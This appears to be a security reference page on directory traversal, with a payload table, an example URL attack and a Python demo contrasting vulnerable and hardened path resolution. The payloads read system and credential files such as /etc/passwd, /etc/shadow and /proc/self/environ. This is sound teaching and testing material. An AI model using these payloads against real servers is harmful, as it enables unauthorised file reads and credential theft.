Directory Traversal
| Aspect | Details |
|---|---|
| Description | Directory Traversal (also called path traversal) is a web application vulnerability in which user-controlled input is used to build a file system path, so that `../` (or `..\`) segments let an attacker read, and sometimes write, files outside the directory the application intends to expose, such as the web root or an upload folder. |
| Conditions to be Vulnerable | - The application accepts user input that ends up in a file path (a filename, a relative path, a template or log name) without validation or normalisation. - That input is passed more or less directly to a file system call (open, read, include, copy, delete). - No containment check confirms that the resolved path still lies under the intended base directory, and no OS-level control (chroot, dedicated low-privileged user, read-only mount) limits what the web process can reach. |
| Where to Find | - File download, view, export or preview endpoints that take a filename parameter (`file=`, `path=`, `doc=`, `template=`). - PHP `include`/`require` statements fed by user input (the related local file inclusion case, which also executes what it reads). - File upload functionality where the user controls the destination path or the filename. - Any parameter whose value already looks like a file name or path is a candidate. |
| Common Payloads | - `../../etc/passwd` - `..%2f..%2f..%2f..%2fetc%2fpasswd` (URL-encoded `/`, for filters that strip a literal `../`) - `..\..\..\..\Windows\System32\config\SYSTEM` (Windows target) - `..%2f..%2f..%2f..%2fvar%2flib%2fmysql%2fmysql.sock` - `..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd` (`%5c` is an encoded backslash; only a separator where the server normalises Windows-style paths) - `../../../../../../../../etc/shadow` (readable only if the process runs as root) - `..%2f..%2f..%2f..%2fhome%2fuser%2fsecret.txt` - `..%2f..%2f..%2f..%2fboot.ini` (Windows target) - `..%2f..%2f..%2f..%2fproc%2fself%2fenviron` (environment of the web process itself, often including credentials) |
| Example | URL: `http://example.com/download.php?file=reports/report1.pdf` Payload: `http://example.com/download.php?file=../../../../etc/passwd` If the `file` parameter is concatenated onto the reports directory without validation, the server returns the contents of `/etc/passwd` instead of a report. A low-noise first check is to request a known-good file through a traversal sequence that cancels itself out, for example `file=reports/../reports/report1.pdf`; if that still works, the parameter reaches the file system without being restricted to a fixed name, and the real payloads above are worth trying. |
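The vulnerable concatenation from the `download.php` example and a hardened resolver side by side, as an added example that is not part of the original page. The document roots (`/var/www/app/files` and `C:\inetpub\wwwroot\files`) are assumed, and the payloads are the ones from the table above plus one double-encoded variant that the table does not list. Pure path modules (`posixpath`, `ntpath`) stand in for the Linux and Windows file systems so the example runs offline; the "vulnerable" function shows where each payload lands, and the "safe" one shows the containment check that stops it. It also shows that the `%5c` (backslash) payloads only escape on a Windows-style path parser.

```python
import posixpath
import ntpath
from urllib.parse import unquote

# Constructed document roots for a Linux and a Windows deployment (assumed).
LINUX_ROOT = "/var/www/app/files"
WINDOWS_ROOT = "C:\\inetpub\\wwwroot\\files"

# Payloads from the table above, plus a double-encoded variant (an assumption,
# not in the table) that shows why the decode step must run exactly once.
PAYLOADS = {
    "benign":        "reports/report1.pdf",
    "plain":         "../../../../etc/passwd",
    "url_encoded":   "..%2f..%2f..%2f..%2fetc%2fpasswd",
    "backslash_enc": "..%5c..%5c..%5c..%5cetc%5cpasswd",
    "windows":       "..\\..\\..\\..\\Windows\\System32\\config\\SYSTEM",
    "boot_ini":      "..%2f..%2f..%2f..%2fboot.ini",
    "double_enc":    "%252e%252e%252fetc%252fpasswd",
}


def vulnerable_path(root, user_file, pathmod=posixpath):
    """What download.php effectively does: decode once, concatenate, open.

    There is no containment check, so '..' segments walk out of `root`.
    `pathmod` selects the separator rules of the target OS (posixpath or
    ntpath) without touching a real disk.
    """
    return pathmod.normpath(pathmod.join(root, unquote(user_file)))


def safe_path(root, user_file, pathmod=posixpath):
    """Hardened resolver: decode once, normalise, then prove containment.

    Raises ValueError for anything that does not resolve strictly below
    `root`.  On a live system also run os.path.realpath() on the result, so a
    symlink planted inside the root cannot point back out of it.
    """
    decoded = unquote(user_file)   # exactly one decode, at one layer
    if "\x00" in decoded:          # NUL truncates the path in C-backed servers
        raise ValueError("NUL byte in path")
    if pathmod.isabs(decoded) or pathmod.splitdrive(decoded)[0]:
        raise ValueError("absolute path or drive letter supplied")
    candidate = pathmod.normpath(pathmod.join(root, decoded))
    root_norm = pathmod.normpath(root)
    # Compare with a trailing separator so 'files2' is not accepted as inside 'files'.
    # normcase makes the Windows comparison case-insensitive.
    prefix = pathmod.normcase(root_norm) + pathmod.sep
    if not pathmod.normcase(candidate).startswith(prefix):
        raise ValueError("path escapes document root: %r" % candidate)
    return candidate


def escapes(root, user_file, pathmod=posixpath):
    """True when safe_path() rejects the input for the given OS path rules."""
    try:
        safe_path(root, user_file, pathmod)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    for os_name, root, pathmod in (("linux", LINUX_ROOT, posixpath),
                                   ("windows", WINDOWS_ROOT, ntpath)):
        for name, payload in PAYLOADS.items():
            print("%-8s %-14s naive=%-45s rejected=%s" % (
                os_name, name, vulnerable_path(root, payload, pathmod),
                escapes(root, payload, pathmod)))
```

Two things the output makes visible: the `..%5c` payload is a harmless, odd filename under POSIX rules but reaches `C:\etc\passwd` under Windows rules, so payload choice depends on the target; and the double-encoded payload stays inside the root only because the decode runs once, so a server that decodes in the framework and again in application code reopens the hole.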
Dedicated Directory Traversal Vulnerability Payloads:
| Credit | Resource |
|---|---|
| Swisskyrepo - PayloadsAllTheThings | Directory Traversal Payloads |
| InfoSecWarrior | Offensive Payloads |
| Swisskyrepo - PayloadsAllTheThings | Directory Traversal README |
| Omurugur | Path Traversal Payload List |